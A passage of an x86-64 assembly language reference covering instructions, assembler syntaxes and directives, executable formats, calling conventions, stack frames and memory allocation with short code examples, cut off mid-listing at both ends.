add [mem], rax ; memory += RAX
adc rax, rbx ; add with carry (for multi-precision)
Subtraction
sub rax, rbx ; RAX = RAX - RBX
sub rax, 1234 ; RAX = RAX - 1234
sbb rax, rbx ; subtract with borrow
Multiplication
mul rbx ; unsigned: RDX:RAX = RAX * RBX
imul rbx ; signed: RDX:RAX = RAX * RBX
imul rax, rbx ; RAX = RAX * RBX
imul rax, rbx, 1234 ; RAX = RBX * 1234
Division
div rbx ; unsigned: RAX = RDX:RAX / RBX, RDX = remainder
idiv rbx ; signed: same
Increment/Decrement
inc rax ; RAX++
dec rax ; RAX--
Negation
neg rax ; RAX = -RAX (two's complement)
Comparison
cmp rax, rbx ; set flags based on RAX - RBX
test rax, rax ; set flags based on RAX & RAX (check zero)
AND
and rax, rbx ; RAX = RAX & RBX
and rax, 0x0F ; mask low 4 bits
and [mem], rax ; memory &= RAX
OR
or rax, rbx ; RAX = RAX | RBX
or rax, 0x80 ; set bit 7
XOR
xor rax, rbx ; RAX = RAX ^ RBX
xor rax, rax ; zero RAX (most efficient)
NOT
not rax ; RAX = ~RAX (one's complement)
TEST
test rax, rbx ; set flags based on RAX & RBX (no destination)
test rax, rax ; check if RAX is zero/negative
Unconditional Jumps
jmp label ; jump to label
jmp rax ; jump to address in RAX (register indirect)
jmp [mem] ; jump to address in memory
Conditional Jumps
Based on flags:
jz label ; jump if zero (ZF=1)
jnz label ; jump if not zero (ZF=0)
je label ; jump if equal (same as JZ)
jne label ; jump if not equal (same as JNZ)
jg label ; jump if greater (signed) (ZF=0 and SF=OF)
jge label ; jump if greater or equal (signed) (SF=OF)
jl label ; jump if less (signed) (SF≠OF)
jle label ; jump if less or equal (signed) (ZF=1 or SF≠OF)
ja label ; jump if above (unsigned) (CF=0 and ZF=0)
jae label ; jump if above or equal (unsigned) (CF=0)
jb label ; jump if below (unsigned) (CF=1)
jbe label ; jump if below or equal (unsigned) (CF=1 or ZF=1)
jc label ; jump if carry (CF=1)
jnc label ; jump if not carry (CF=0)
jo label ; jump if overflow (OF=1)
jno label ; jump if not overflow (OF=0)
js label ; jump if sign (SF=1)
jns label ; jump if not sign (SF=0)
jp label ; jump if parity (PF=1)
jnp label ; jump if not parity (PF=0)
Loop Instructions
loop label ; decrement RCX, jump if RCX != 0
loope label ; loop while ZF=1 and RCX != 0
loopne label ; loop while ZF=0 and RCX != 0
Call and Return
call func ; push return address, jump to func
ret ; pop return address, jump
ret 16 ; pop return address, add 16 to RSP
Interrupts
int 0x80 ; software interrupt (legacy Linux syscall)
int3 ; breakpoint interrupt
into ; interrupt on overflow (invalid in 64-bit mode)
iretq ; return from interrupt (64-bit form of iret)
String instructions operate on memory with automatic pointer updates.
MOVS (Move String)
movsb ; move byte from [RSI] to [RDI], update pointers
movsw ; move word
movsd ; move dword
movsq ; move qword (64-bit)
; Repeat prefix for blocks
rep movsb ; repeat RCX times
CMPS (Compare String)
cmpsb ; compare byte at [RSI] with [RDI]
rep cmpsb ; same encoding as repe cmpsb: compare until difference found
repe cmpsb ; compare while equal
repne cmpsb ; compare while not equal
SCAS (Scan String)
scasb ; compare AL with [RDI]
scasw ; compare AX with [RDI]
scasd ; compare EAX with [RDI]
scasq ; compare RAX with [RDI]
repne scasb ; scan for AL
STOS (Store String)
stosb ; store AL to [RDI]
stosw ; store AX to [RDI]
stosd ; store EAX to [RDI]
stosq ; store RAX to [RDI]
rep stosb ; fill memory with AL
LODS (Load String)
lodsb ; load from [RSI] to AL
lodsw ; load to AX
lodsd ; load to EAX
lodsq ; load to RAX
Shift Instructions
shl rax, 1 ; shift left, fill with 0
shr rax, 1 ; shift right, fill with 0
sal rax, 1 ; shift arithmetic left (same as SHL)
sar rax, 1 ; shift arithmetic right (preserve sign)
; Variable shifts
shl rax, cl ; shift by CL
Rotate Instructions
rol rax, 1 ; rotate left
ror rax, 1 ; rotate right
rcl rax, 1 ; rotate through carry left
rcr rax, 1 ; rotate through carry right
Bit Test Instructions
bt rax, 5 ; test bit 5, copy to CF
bts rax, 5 ; test and set
btr rax, 5 ; test and reset
btc rax, 5 ; test and complement
; Memory forms
bt dword [mem], 5 ; test bit in memory (size specifier required)
Bit Scan
bsf rax, rbx ; bit scan forward (index of lowest set bit)
bsr rax, rbx ; bit scan reverse (index of highest set bit)
tzcnt rax, rbx ; trailing zero count (BMI1)
lzcnt rax, rbx ; leading zero count (LZCNT/ABM)
popcnt rax, rbx ; population count (Nehalem+)
Privileged Instructions
lgdt [mem] ; load GDT
sgdt [mem] ; store GDT
lidt [mem] ; load IDT
sidt [mem] ; store IDT
lldt ax ; load LDT
sldt rax ; store LDT
ltr ax ; load task register
str rax ; store task register
mov cr0, rax ; move to control register
mov rax, cr3 ; move from control register
mov dr0, rax ; move to debug register
invlpg [mem] ; invalidate TLB entry
wbinvd ; write back and invalidate cache
System Call Instructions
syscall ; fast system call (64-bit)
sysret ; return from syscall
sysenter ; fast system call (32-bit)
sysexit ; return from sysenter
int 0x80 ; legacy interrupt-based syscall
Halt and Wait
hlt ; halt processor until interrupt
pause ; spin loop hint (improves power/performance)
SIMD instructions process multiple data elements in one instruction.
SSE Registers
- XMM0-XMM15: 128-bit (16 bytes)
- Support for integer and floating-point operations
SSE Data Types
; Packed types (C intrinsic type names)
__m128 ; 4 floats
__m128d ; 2 doubles
__m128i ; integer (16 bytes)
; Scalar operations use the low element of the same types
__m128 ; single float in the low 32 bits (high 96 bits ignored)
Basic SSE Instructions
; Move
movaps xmm0, xmm1 ; move aligned packed single
movups xmm0, [mem] ; move unaligned packed single
movss xmm0, [mem] ; move scalar single
; Arithmetic
addps xmm0, xmm1 ; add packed single
addss xmm0, xmm1 ; add scalar single
; subps, mulps, divps, sqrtps, etc. follow the same pattern
; Logical
andps xmm0, xmm1 ; bitwise AND
; orps, xorps follow the same pattern
; Compare
cmpps xmm0, xmm1, 0 ; compare equal (packed)
cmpps xmm0, xmm1, 1 ; compare less
cmpps xmm0, xmm1, 2 ; compare less or equal
AVX (Advanced Vector Extensions)
256-bit YMM registers:
vmovaps ymm0, ymm1 ; move 8 floats
vaddps ymm0, ymm1, ymm2 ; add 8 floats (3-operand)
AVX-512
512-bit ZMM registers with masking:
; Masked operation
vpaddd zmm0 {k1}, zmm1, zmm2 ; add with mask k1
Legacy x87 FPU (rarely used now, but still present).
FPU Register Stack
8 registers (ST0-ST7) as a stack:
- ST(0) is top
- Values are 80-bit extended precision
FPU Instructions
; Data transfer
fld dword [mem] ; load float to ST0 (size specifier required)
fst dword [mem] ; store ST0 to memory
fstp dword [mem] ; store and pop
; Arithmetic
fadd st0, st1 ; ST0 = ST0 + ST1
; fsub, fmul, fdiv follow the same pattern
; Compare
fcom st1 ; compare ST0 with ST1
fcomp ; compare and pop
fcompp ; compare and pop twice
; Constants
fldz ; load 0.0
fld1 ; load 1.0
fldpi ; load π
; Transcendental
fsin ; ST0 = sin(ST0)
fcos ; ST0 = cos(ST0)
fpatan ; ST1 = arctan(ST1 / ST0), then pop
fyl2x ; ST1 = ST1 * log2(ST0), then pop
Two main syntax families for x86 assembly.
Intel Syntax (NASM, MASM, FASM)
; Instruction destination, source
mov eax, ebx ; copy EBX to EAX
mov eax, [ebx+4] ; load from memory
mov dword [eax], 10 ; store immediate to memory
jmp label ; jump to label
AT&T Syntax (GAS)
# Instruction source, destination (opposite order)
movl %ebx, %eax # copy EBX to EAX
movl 4(%ebx), %eax # load from memory
movl $10, (%eax) # store immediate to memory
jmp label # jump to label
Key Differences
| Feature | Intel | AT&T |
|---|---|---|
| Order | dest, src | src, dest |
| Register | eax | %eax |
| Immediate | 123 | $123 |
| Memory | [ebx+4] | 4(%ebx) |
| Size | dword ptr | l (long) |
| Address | [eax+ebx*4] | (%eax,%ebx,4) |
Size Mnemonics (AT&T)
- b = byte (8-bit)
- w = word (16-bit)
- l = long (32-bit)
- q = quad (64-bit)
- t = ten bytes (80-bit)
Assembler directives control the assembly process.
NASM Directives
; Section directives
section .text ; code section
section .data ; initialized data
section .bss ; uninitialized data
; Data definition
db 0x55 ; define byte
dw 0x1234 ; define word
dd 0x12345678 ; define dword
dq 0x123456789ABCDEF0 ; define qword
dt 1.234 ; define 80-bit float
; Multiple values
db 1, 2, 3, 4 ; sequence of bytes
times 100 db 0 ; repeat 100 times
; Strings
db 'Hello', 0 ; C-style string
db "Hello", 10 ; with newline
; Equates
value equ 100 ; constant
%define macro(x) x+1 ; macro
; Alignment
align 16 ; align to 16-byte boundary
alignb 16 ; align in BSS (no data emitted)
; Symbols
global _start ; export symbol
extern printf ; import symbol
MASM Directives
.MODEL flat, C ; memory model
.STACK 4096 ; stack size
.DATA
var1 DB 10 ; byte variable
var2 DW 1234h ; word variable
array DD 10 DUP(0) ; 10 dwords initialized to 0
msg DB "Hello", 0 ; string
.CODE
main PROC
mov eax, 0
ret
main ENDP
END main
Executable files are organized into sections.
.text Section
Contains executable code:
- Read-only (usually)
- Shared among processes
- Contains instructions and constants
section .text
global _start
_start:
mov eax, 1 ; syscall number (sys_exit in the 32-bit int 0x80 ABI)
mov ebx, 0 ; exit code
int 0x80 ; kernel call
.data Section
Initialized data:
- Read-write
- Values defined at compile time
- Takes space in executable
section .data
message db 'Hello, World!', 10, 0
len equ $ - message ; length calculation
array dd 1, 2, 3, 4, 5
count dd 5
pi dq 3.141592653589793
.bss Section
Uninitialized data:
- Read-write
- Takes no space in executable
- Zero-filled at program start
section .bss
buffer resb 4096 ; reserve 4096 bytes
temp resd 1 ; reserve one dword
array resq 100 ; reserve 100 qwords
Labels represent addresses in the code or data.
Local Labels
loop_start:
dec ecx
jnz loop_start
; Local labels starting with .
func:
.loop: ; local to func
dec ecx
jnz .loop
ret
Special Symbols
$ ; current address
$$ ; start of current section
section .data
msg db 'Hello', 0
.len equ $ - msg ; length of string
Good comments are essential in assembly.
Comment Styles
; Single line comment (NASM, MASM, FASM; GAS uses # on x86)
; Multi-line comment
; can continue
; on multiple lines
%if 0 ; NASM block comment
This is commented out
%endif
/*
* C-style comment (GAS)
* Can span multiple lines
*/
Documentation Standards
; Function: strcpy - copy string
; Arguments:
; RDI - destination buffer
; RSI - source string
; Returns:
; RAX - destination (like C strcpy)
; Clobbers:
; RCX, RDX, RFLAGS
; Notes:
; Assumes buffers are large enough
; Copies until null terminator
strcpy:
push rbp
mov rbp, rsp
; Main copy loop
xor ecx, ecx ; index = 0
.copy_loop:
mov dl, [rsi + rcx] ; get source byte
mov [rdi + rcx], dl ; store to destination
inc rcx
test dl, dl ; check for null
jnz .copy_loop
; Return the destination pointer
mov rax, rdi
pop rbp
ret
NASM is the most popular assembler for x86 on Unix-like systems.
Basic Usage
# Assemble to object file
nasm -f elf64 program.asm -o program.o
# Assemble with debug info
nasm -f elf64 -g program.asm -o program.o
# Generate listing file
nasm -f elf64 -l program.lst program.asm
# Preprocess only
nasm -E program.asm
# Link with ld
ld program.o -o program
# Link with glibc
gcc -no-pie program.o -o program
NASM Example
; hello.asm - Hello World program
section .data
msg db 'Hello, World!', 10 ; no trailing 0, so len counts only printable bytes
len equ $ - msg
section .text
global _start
_start:
; Write syscall
mov rax, 1 ; sys_write
mov rdi, 1 ; stdout
mov rsi, msg ; buffer
mov rdx, len ; length
syscall
; Exit syscall
mov rax, 60 ; sys_exit
xor rdi, rdi ; status 0
syscall
NASM Features
- Macro preprocessor
- Conditional assembly
- Structure definitions
- Local labels
- Expression evaluation
MASM is the traditional assembler for Windows.
MASM Example
; hello.asm - Hello World for Windows
.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\masm32.inc ; declares StdOut
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\masm32.lib
.data
msg db "Hello, World!", 13, 10, 0
len equ $ - msg
.code
start:
invoke StdOut, addr msg
invoke ExitProcess, 0
end start
MASM Features
- High-level-like syntax (INVOKE)
- Structure definitions
- Record types
- Simplified segment directives
GAS is the default assembler on Linux/Unix systems.
GAS Example
# hello.s - Hello World in GAS syntax
.section .data
msg:
.ascii "Hello, World!\n"
len = . - msg
.section .text
.globl _start
_start:
# write syscall
movl $4, %eax # sys_write
movl $1, %ebx # stdout
movl $msg, %ecx # buffer
movl $len, %edx # length
int $0x80
# exit syscall
movl $1, %eax # sys_exit
movl $0, %ebx # status
int $0x80
GAS with Intel Syntax
.intel_syntax noprefix
.section .data
msg: .ascii "Hello, World!\n"
len = . - msg
.section .text
.globl _start
_start:
mov eax, 4
mov ebx, 1
mov ecx, offset msg
mov edx, len
int 0x80
mov eax, 1
xor ebx, ebx
int 0x80
FASM is a lightweight, high-performance assembler.
FASM Example
; hello.asm - Hello World in FASM
format ELF64 executable
segment readable executable
entry _start
_start:
mov eax, 1 ; sys_write
mov edi, 1 ; stdout
mov esi, msg ; buffer
mov edx, len ; length
syscall
mov eax, 60 ; sys_exit
xor edi, edi ; status
syscall
segment readable writeable
msg db 'Hello, World!', 10
len = $ - msg
FASM Features
- Self-compiling (written in assembly)
- Very fast
- Multiple output formats
- Powerful macro system
The GNU linker (ld) combines object files into executables.
Basic LD Usage
# Link single object
ld program.o -o program
# Link with libraries
ld program.o -lc -o program -dynamic-linker /lib64/ld-linux-x86-64.so.2
# Link with custom layout
ld -T script.ld program.o -o program
Linker Script Example
/* simple.ld - Simple linker script */
OUTPUT_FORMAT(elf64-x86-64)
ENTRY(_start)
SECTIONS
{
. = 0x400000; /* Starting address */
.text : {
*(.text)
*(.text.*)
}
.data : {
*(.data)
*(.data.*)
}
.bss : {
*(.bss)
*(.bss.*)
}
/DISCARD/ : {
*(.comment)
*(.note.*)
}
}
ELF (Executable and Linkable Format)
Standard format on Linux/Unix:
ELF Header
- Magic number (7F 45 4C 46)
- Architecture (x86-64)
- Entry point
- Program header offset
- Section header offset
Program Header Table
- Segment definitions (LOAD, INTERP, DYNAMIC)
- Virtual addresses
- Permissions (R, W, E)
Section Header Table
- Section definitions (.text, .data, .bss)
- Section sizes and offsets
Sections
- Actual code and data
- Symbol tables
- Debug information
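The first header fields listed above sit at fixed offsets, so they can be checked without a full parser. The following is a minimal sketch under stated assumptions: the function name is hypothetical, the caller has already read at least the first 20 bytes of the file into `buf`, and only little-endian 64-bit x86-64 files are accepted.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: checks the fixed-offset identification fields at
   the start of an ELF header. */
static bool is_elf64_x86_64(const uint8_t *buf, size_t len)
{
    if (len < 20)
        return false;                    /* need bytes up to e_machine */
    if (buf[0] != 0x7F || buf[1] != 'E' || buf[2] != 'L' || buf[3] != 'F')
        return false;                    /* magic number 7F 45 4C 46 */
    if (buf[4] != 2)
        return false;                    /* EI_CLASS: 2 = 64-bit */
    if (buf[5] != 1)
        return false;                    /* EI_DATA: 1 = little-endian */
    uint16_t machine = (uint16_t)(buf[18] | (buf[19] << 8));
    return machine == 0x3E;              /* e_machine: EM_X86_64 */
}
```

The entry point and the program/section header offsets follow later in the same header and would be read the same way.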
PE (Portable Executable)
Windows format:
DOS Header (MZ)
DOS Stub
PE Header
- Signature (PE\0\0)
- COFF header
- Optional header
Section Table
- .text (code)
- .data (initialized data)
- .rdata (read-only data)
- .bss (uninitialized)
- .idata (imports)
- .edata (exports)
- .reloc (relocations)
Sections
- Actual code/data
- Import/export tables
- Resources
Mach-O
macOS format:
Header
- Magic number
- CPU type
- File type
Load Commands
- Segment definitions
- Dynamic linking info
- Thread state
Segments
- __TEXT (code)
- __DATA (data)
- __LINKEDIT (linker info)
Implementing if-then-else structures.
Simple If
if (x > 10) {
y = 1;
}
cmp dword [x], 10
jle .skip ; jump if not > 10
mov dword [y], 1
.skip:
If-Else
if (x > 10) {
y = 1;
} else {
y = 2;
}
cmp dword [x], 10
jle .else
mov dword [y], 1
jmp .endif
.else:
mov dword [y], 2
.endif:
Complex Conditions
if (x > 10 && y < 20) {
z = 1;
}
cmp dword [x], 10
jle .false ; first condition false
cmp dword [y], 20
jge .false ; second condition false
mov dword [z], 1
jmp .endif
.false:
; do nothing or else part
.endif:
While Loop
while (i < 10) {
a[i] = 0;
i++;
}
xor ecx, ecx ; i = 0
.while:
cmp ecx, 10
jge .end_while
mov dword [array + ecx*4], 0
inc ecx
jmp .while
.end_while:
Do-While Loop
do {
a[i] = 0;
i++;
} while (i < 10);
xor ecx, ecx
.do:
mov dword [array + ecx*4], 0
inc ecx
cmp ecx, 10
jl .do
For Loop
for (i = 0; i < 10; i++) {
a[i] = i;
}
xor ecx, ecx
.for:
cmp ecx, 10
jge .end_for
mov [array + ecx*4], ecx
inc ecx
jmp .for
.end_for:
Using LOOP Instruction
mov ecx, 10
xor eax, eax
.loop:
add eax, ecx
loop .loop ; dec rcx, jump if not zero
Jump Table Method
switch (x) {
case 0: y = 10; break;
case 1: y = 20; break;
case 2: y = 30; break;
default: y = 0;
}
; x in EAX, y in EBX
cmp eax, 2
ja .default ; if > 2 (unsigned), default
jmp [jump_table + rax*8] ; jump via table (assumes the upper half of RAX is zero)
jump_table:
dq .case0
dq .case1
dq .case2
.case0:
mov ebx, 10
jmp .end_switch
.case1:
mov ebx, 20
jmp .end_switch
.case2:
mov ebx, 30
jmp .end_switch
.default:
xor ebx, ebx
.end_switch:
Comparison Chain
For sparse or non-consecutive cases:
cmp eax, 10
je .case10
cmp eax, 20
je .case20
cmp eax, 30
je .case30
jmp .default
Jump tables enable efficient multi-way branching.
Computed GOTO
; Jump to address in RAX
jmp rax
; Jump to address from memory
jmp [jump_table + rbx*8]
; Indirect call
call [function_table + rcx*8]
Example: State Machine
state_machine:
; RBX = current state
jmp [state_table + rbx*8]
state_table:
dq state_idle
dq state_active
dq state_error
dq state_done
state_idle:
; handle idle state
; set next state
jmp state_machine
state_active:
; handle active state
jmp state_machine
state_error:
; handle error
jmp state_machine
state_done:
; finished
ret
GCC Extended ASM
int add(int a, int b) {
int result;
__asm__ volatile (
"addl %%ebx, %%eax"
: "=a" (result)
: "a" (a), "b" (b)
: "cc"
);
return result;
}
Syntax Breakdown:
__asm__ [volatile] (
"instructions\n\t"
: output operands (optional)
: input operands (optional)
: clobbered registers (optional)
);
Constraints:
- "a" = use EAX
- "b" = use EBX
- "c" = use ECX
- "d" = use EDX
- "r" = any register
- "m" = memory operand
- "i" = immediate
Example: CPUID
void cpuid(int code, int *a, int *b, int *c, int *d) {
__asm__ volatile (
"cpuid"
: "=a" (*a), "=b" (*b), "=c" (*c), "=d" (*d)
: "a" (code)
: "cc"
);
}
Example: RDTSC
#include <stdint.h>
uint64_t rdtsc(void) {
uint32_t lo, hi;
__asm__ volatile (
"rdtsc"
: "=a" (lo), "=d" (hi) // rdtsc writes EDX:EAX only, so no clobber list is needed
);
return ((uint64_t)hi << 32) | lo;
}
MSVC Inline Assembly
int add(int a, int b) {
__asm {
mov eax, a
add eax, b
; result in eax
}
// Value in EAX is returned
}
MSVC Limitations:
- The x64 compiler doesn't support inline assembly
- Must use separate .asm files (or compiler intrinsics) for x64
Calling conventions define how functions receive parameters and return values.
System V AMD64 ABI (Linux, macOS, BSD)
Used on Unix-like systems for x86-64:
Integer/pointer arguments:
RDI, RSI, RDX, RCX, R8, R9 (in order)
Floating-point arguments:
XMM0-XMM7
Additional arguments: stack (right-to-left)
Return values:
RAX (integer/pointer)
RDX:RAX (128-bit)
XMM0/XMM0:XMM1 (float)
Registers:
Callee-saved: RBX, RBP, R12-R15
Caller-saved: all others
RAX, RCX, RDX, RSI, RDI, R8-R11 are scratch
Stack alignment: 16-byte before CALL
Example:
int func(int a, int b, int c, int d, int e, int f, int g) {
return a + b + c + d + e + f + g;
}
; a=EDI, b=ESI, c=EDX, d=ECX, e=R8D, f=R9D, g=[RSP+8] at entry
; (int arguments occupy the low 32 bits; the upper halves are undefined)
func:
push rbp
mov rbp, rsp
add edi, esi ; a+b
add edi, edx ; +c
add edi, ecx ; +d
add edi, r8d ; +e
add edi, r9d ; +f
add edi, [rbp+16] ; +g (skip saved RBP + return address)
mov eax, edi ; return value
pop rbp
ret
Microsoft x64 Calling Convention (Windows)
Arguments:
RCX, RDX, R8, R9 (first four)
Stack (right-to-left) for additional
Return values:
RAX (integer/pointer)
XMM0 (float)
Registers:
Callee-saved: RBX, RBP, RDI, RSI, R12-R15, XMM6-XMM15
Caller-saved: all others
Shadow space: Caller reserves 32 bytes on stack
Stack alignment: 16-byte before CALL
func:
; ECX = a, EDX = b, R8D = c, R9D = d
; At entry: [RSP+40] = e, [RSP+48] = f, [RSP+56] = g
; (return address at [RSP], then 32 bytes of shadow space)
push rbp
mov rbp, rsp
add ecx, edx ; a+b
add ecx, r8d ; +c
add ecx, r9d ; +d
add ecx, [rbp+48] ; +e (saved RBP + return address + shadow space)
add ecx, [rbp+56] ; +f
add ecx, [rbp+64] ; +g
mov eax, ecx
pop rbp
ret
cdecl (32-bit)
Classic 32-bit calling convention:
Arguments: stack (right-to-left)
Return: EAX
Caller cleans stack
push dword 3
push dword 2
push dword 1
call func
add esp, 12 ; caller cleans up
stdcall (32-bit Windows)
Like cdecl but callee cleans stack:
func proc
push ebp
mov ebp, esp
mov eax, [ebp+8] ; first arg
; ...
pop ebp
ret 12 ; return and clean 12 bytes
func endp
fastcall (32-bit)
First two/three arguments in registers:
- ECX, EDX (Microsoft)
- EAX, EDX, ECX (Borland)
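As a compact summary of the two 64-bit conventions described above, the sketch below maps an integer or pointer argument's position to the register that carries it. The function names are hypothetical, and the mapping assumes every argument is an integer or pointer; floating-point arguments follow the separate XMM rules.

```c
#include <stddef.h>

/* Hypothetical helper: register holding the n-th (0-based) integer or
   pointer argument under System V AMD64, or NULL if it goes on the stack. */
static const char *sysv_int_arg_reg(unsigned n)
{
    static const char *const regs[] = { "RDI", "RSI", "RDX", "RCX", "R8", "R9" };
    return n < 6 ? regs[n] : NULL;
}

/* Same idea for the Microsoft x64 convention, which has four register slots. */
static const char *win64_int_arg_reg(unsigned n)
{
    static const char *const regs[] = { "RCX", "RDX", "R8", "R9" };
    return n < 4 ? regs[n] : NULL;
}
```

With seven integer arguments, the seventh (index 6) is on the stack under System V, while under the Microsoft convention everything from the fifth argument onward is.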
Prologue
push rbp ; save caller's frame pointer
mov rbp, rsp ; set our frame pointer
sub rsp, 32 ; allocate local variables
Epilogue
mov rsp, rbp ; restore stack pointer
pop rbp ; restore frame pointer
ret ; return
Frame Pointer Optimization
Compiler can omit frame pointer (-fomit-frame-pointer):
func:
sub rsp, 40 ; allocate locals + alignment
; use RSP+offset for locals
mov eax, [rsp+32] ; local variable
add rsp, 40
ret
Accessing Stack Arguments
32-bit (cdecl):
push ebp
mov ebp, esp
mov eax, [ebp+8] ; first argument
mov edx, [ebp+12] ; second argument (EDX is caller-saved, unlike EBX)
; ...
mov esp, ebp
pop ebp
ret
64-bit (System V):
; First 6 args in registers
; 7th+ on stack at [RSP+8], [RSP+16], etc.
func:
push rbp
mov rbp, rsp
; RDI, RSI, RDX, RCX, R8, R9 are args
mov rax, [rbp+16] ; 7th arg (skip return address + saved RBP)
pop rbp
ret
Variable Arguments (varargs)
int sum(int count, ...) {
int total = 0;
va_list args;
va_start(args, count);
for(int i = 0; i < count; i++)
total += va_arg(args, int);
va_end(args);
return total;
}
Assembly must handle variable number of arguments:
; EDI = count
; ESI, EDX, ECX, R8D, R9D = first five varargs; the rest are on the stack
sum:
push rbp
mov rbp, rsp
mov r10d, edi ; remaining count (leaves RCX intact, it holds an argument)
xor eax, eax ; total
; Process register arguments
test r10d, r10d
jz .done
add eax, esi ; add first vararg
dec r10d
jz .done
add eax, edx
dec r10d
jz .done
add eax, ecx
dec r10d
jz .done
add eax, r8d
dec r10d
jz .done
add eax, r9d
dec r10d
jz .done
; Remaining args on stack, one 8-byte slot each
lea rsi, [rbp+16] ; first stack arg
.loop_stack:
add eax, [rsi]
add rsi, 8
dec r10d
jnz .loop_stack
.done:
pop rbp
ret
Factorial Example
int factorial(int n) {
if (n <= 1) return 1;
return n * factorial(n-1);
}
; EDI = n
factorial:
push rbp
mov rbp, rsp
cmp edi, 1
jle .base_case
; Save n
push rdi
sub rsp, 8 ; keep RSP 16-byte aligned for the call
; factorial(n-1)
dec edi
call factorial
; Multiply by n
add rsp, 8
pop rdi
imul eax, edi
jmp .return
.base_case:
mov eax, 1
.return:
pop rbp
ret
Tail Recursion Optimization
When recursive call is the last operation:
int factorial_tail(int n, int acc) {
if (n <= 1) return acc;
return factorial_tail(n-1, acc * n);
}
; EDI = n, ESI = acc
factorial_tail:
cmp edi, 1
jle .done
imul esi, edi ; acc *= n
dec edi ; n--
; Tail call optimization - just jump
jmp factorial_tail ; no new stack frame
.done:
mov eax, esi
ret
Tail call optimization reuses the current stack frame.
Before Optimization
int func1(int x) {
return func2(x + 1);
}
func1:
push rbp
mov rbp, rsp
inc edi
call func2
pop rbp
ret
After Optimization
func1:
inc edi
jmp func2 ; jump instead of call/ret
Requirements for TCO:
- Call is last instruction before ret
- No local variables needed after call
- Must preserve stack alignment
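The effect of the optimization can be seen by writing both forms in C. The sketch below reuses `factorial_tail` from the earlier example and adds `factorial_loop`, a name chosen here for illustration, showing what the jump-based version computes: the arguments are updated in place and control returns to the top.

```c
/* Tail-recursive form: the recursive call is the last operation. */
static int factorial_tail(int n, int acc)
{
    if (n <= 1)
        return acc;
    return factorial_tail(n - 1, acc * n);
}

/* Equivalent loop: what replacing the call with a jump effectively yields.
   No new stack frame is created per step. */
static int factorial_loop(int n, int acc)
{
    while (n > 1) {
        acc *= n;   /* acc * n becomes the new acc */
        n--;        /* n - 1 becomes the new n */
    }
    return acc;
}
```

Both functions return 120 for `n = 5, acc = 1`. Whether a compiler applies the transformation to the first form depends on its optimization settings.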
Calling printf from Assembly
; hello.asm - Call printf
section .data
format db "Hello, %s!", 10, 0
name db "World", 0
section .text
global main
extern printf
main:
push rbp
mov rbp, rsp
; printf(format, name)
lea rdi, [rel format] ; RIP-relative, works in position-independent code
lea rsi, [rel name]
xor eax, eax ; 0 floating point args
call printf
; return 0
xor eax, eax
pop rbp
ret
Calling Assembly from C
#include <stdio.h>
extern int add(int, int); // implemented in add.asm
int main() {
int result = add(5, 3);
printf("%d\n", result);
return 0;
}
; add.asm
global add
add:
mov eax, edi
add eax, esi
ret
Accessing Global Variables
// C code
extern int global_var;
void set_global(int x) {
global_var = x;
}
; Assembly
extern global_var
global set_global
set_global:
mov [rel global_var], edi
ret
Typical Linux process memory layout:
High addresses (0x00007FFFFFFFFFFF)
+--------------------------+
| Stack | (grows downward)
| ↓ |
+--------------------------+
| |
| Memory Mapped |
| Region |
| |
+--------------------------+
| ↑ |
| Heap | (grows upward)
+--------------------------+
| .bss | (uninitialized data)
+--------------------------+
| .data | (initialized data)
+--------------------------+
| .text | (code)
+--------------------------+
| Reserved |
Low addresses (0x400000)
Memory Segments
- .text: Read-only, executable (code)
- .data: Read-write, initialized global/static variables
- .bss: Read-write, zero-initialized global/static
- Heap: Dynamically allocated memory (malloc)
- Stack: Local variables, function call context
- Memory mapped: Shared libraries, mmap files
Viewing Process Memory
# View memory map of process
cat /proc/<pid>/maps
# Example output:
00400000-00401000 r-xp 00000000 08:01 12345 /bin/program
00600000-00601000 r--p 00000000 08:01 12345 /bin/program
00601000-00602000 rw-p 00001000 08:01 12345 /bin/program
7ffff7a00000-7ffff7bc0000 r-xp 00000000 08:01 libc.so
7ffff7bc0000-7ffff7dc0000 ---p 001c0000 08:01 libc.so
7ffff7dc0000-7ffff7dc4000 r--p 001c0000 08:01 libc.so
7ffff7dc4000-7ffff7dc6000 rw-p 001c4000 08:01 libc.so
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 [stack]
Detailed stack frame layout:
High addresses
+------------------+ <--- Previous frame
| Arguments |
+------------------+
| Return Address | <--- CALL pushes this
+------------------+
| Saved RBP | <--- push rbp
+------------------+ <--- RBP
| Local Variables |
| |
+------------------+
| Padding | (for alignment)
+------------------+ <--- RSP
Low addresses
Stack Frame Example
int func(int a, int b) {
int local1 = a + b;
int local2 = a - b;
return local1 * local2;
}
func:
push rbp
mov rbp, rsp
sub rsp, 16 ; allocate 16 bytes for locals
mov [rbp-4], edi ; save a
mov [rbp-8], esi ; save b
mov eax, [rbp-4]
add eax, [rbp-8]
mov [rbp-12], eax ; local1 = a+b
mov eax, [rbp-4]
sub eax, [rbp-8]
mov [rbp-16], eax ; local2 = a-b
mov eax, [rbp-12]
imul eax, [rbp-16] ; return local1*local2
leave ; mov rsp, rbp; pop rbp
ret
Stack Overflow
Occurs when stack grows too large (infinite recursion, large locals):
; This will overflow the stack
infinite_recursion:
call infinite_recursion
ret
brk/sbrk System Calls
Traditional heap management:
; Increase heap by 4096 bytes
mov rax, 12 ; brk syscall number
mov rdi, 0 ; get current break
syscall
mov rbx, rax ; save current break
add rbx, 4096 ; new break
mov rdi, rbx
mov rax, 12 ; brk
syscall
mmap for Large Allocations
Modern malloc uses mmap for large allocations:
; Allocate 1MB with mmap
mov rax, 9 ; mmap syscall
xor rdi, rdi ; addr = NULL
mov rsi, 0x100000 ; length = 1MB
mov rdx, 3 ; PROT_READ | PROT_WRITE
mov r10, 0x22 ; MAP_PRIVATE | MAP_ANONYMOUS
mov r8, -1 ; fd = -1
xor r9, r9 ; offset = 0
syscall ; returns address in RAX
Simple Heap Allocator
; Very simple bump allocator
section .bss
heap_start resb 0x100000 ; 1MB heap
heap_ptr resq 1
section .text
init_heap:
mov qword [heap_ptr], heap_start
ret
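; Allocate RBX bytes (rounded up to a multiple of 16)
; Returns pointer in RAX, or 0 if the heap is exhausted
; Clobbers RBX, RCX, RDX
alloc:
push rbp
mov rbp, rsp
; Round the request up to a multiple of 16
add rbx, 15
and rbx, ~15
; Compute the proposed new top of heap without committing it
mov rax, [heap_ptr]
lea rdx, [rax + rbx]
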